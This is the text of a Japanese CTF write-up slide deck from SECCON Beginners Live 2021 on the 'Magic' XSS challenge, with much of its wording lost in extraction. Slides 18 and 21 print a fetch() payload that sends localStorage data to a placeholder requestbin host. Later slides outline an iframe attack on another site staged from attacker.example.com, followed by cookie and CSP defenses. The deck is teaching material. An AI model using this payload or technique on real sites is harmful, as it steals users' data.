Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021

by Hi120ki

Slide 1

Slide 1 text

Magic Web SECCON Beginners Live 2021 hi120ki

Slide 2

Slide 2 text

@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing : firmware Web : json, magic

Slide 3

Slide 3 text

Web Magic 3

Slide 4

Slide 4 text

Magic [Web Hard] : 31solve Web 5 • • 4

Slide 5

Slide 5 text

5 /

Slide 6

Slide 6 text

6 /

Slide 7

Slide 7 text

7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

Slide 8

Slide 8 text

8 / URL

Slide 9

Slide 9 text

9 /

Slide 10

Slide 10 text

10 crawler/index.js puppeteer Node.js Chrome URL

Slide 11

Slide 11 text

11 2. FLAG 3. URL crawler/index.js 1.

Slide 12

Slide 12 text

12 FLAG nginx/html/static/index.js FLAG

Slide 13

Slide 13 text

13 FLAG JavaScript XSS( )

Slide 14

Slide 14 text

XSS 14 HTML Web HTML JavaScript Cookie Web

Slide 15

Slide 15 text

15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG

Slide 16

Slide 16 text

16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG …

Slide 17

Slide 17 text

17 FLAG … FLAG https://magic.quals.beginners.seccon.jp/??????????

Slide 18

Slide 18 text

18 fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); FLAG XSS URL

Slide 19

Slide 19 text

XSS 19 magic/views/index.ejs

Slide 20

Slide 20 text

20 alert(1)

Slide 21

Slide 21 text

21 FLAG URL fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo")));

Slide 22

Slide 22 text

22 FLAG URL

Slide 23

Slide 23 text

23 XSS https://magic.quals.beginners.seccon.jp/

Slide 24

Slide 24 text

24 … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS

Slide 25

Slide 25 text

25 ... + = ? XSS

Slide 26

Slide 26 text

26 … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL … FLAG

Slide 27

Slide 27 text

27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...

Slide 28

Slide 28 text

28 URL

Slide 29

Slide 29 text

29 … https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ … FLAG XSS

Slide 30

Slide 30 text

30 FLAG 1. FLAG 2. 3.

Slide 31

Slide 31 text

Slide 32

Slide 32 text

1. XSS 2. 3. 32

Slide 33

Slide 33 text

1. XSS 2. 3. 33 FLAG

Slide 34

Slide 34 text

1. XSS 2. 3. 34

Slide 35

Slide 35 text

1. XSS 2. 3. 35

Slide 36

Slide 36 text

36 FLAG

Slide 37

Slide 37 text

XSS • • Byte Bandits CTF 2020 Notes App • https://github.com/ByteBandits/bbctf-2020 37

Slide 38

Slide 38 text

Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= • FLAG iframe • • API

Slide 39

Slide 39 text

iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL iframe

Slide 40

Slide 40 text

iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe

Slide 41

Slide 41 text

iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG ... XSS FLAG

Slide 42

Slide 42 text

iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML) ...

Slide 43

Slide 43 text

43 iframe SameSite Cookie None Lax

Slide 44

Slide 44 text

44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...) FLAG

Slide 45

Slide 45 text

45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...) FLAG

Slide 46

Slide 46 text

SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie (session=nj49gn...) ✕ FLAG ...

Slide 47

Slide 47 text

47 SameSite Cookie=None iframe CTF

Slide 48

Slide 48 text

48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... ( XSS Content-Security-Policy )

Slide 49

Slide 49 text

49 FLAG +

Slide 50

Slide 50 text

50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup https://hi120ki.github.io/blog/posts/20210523-3/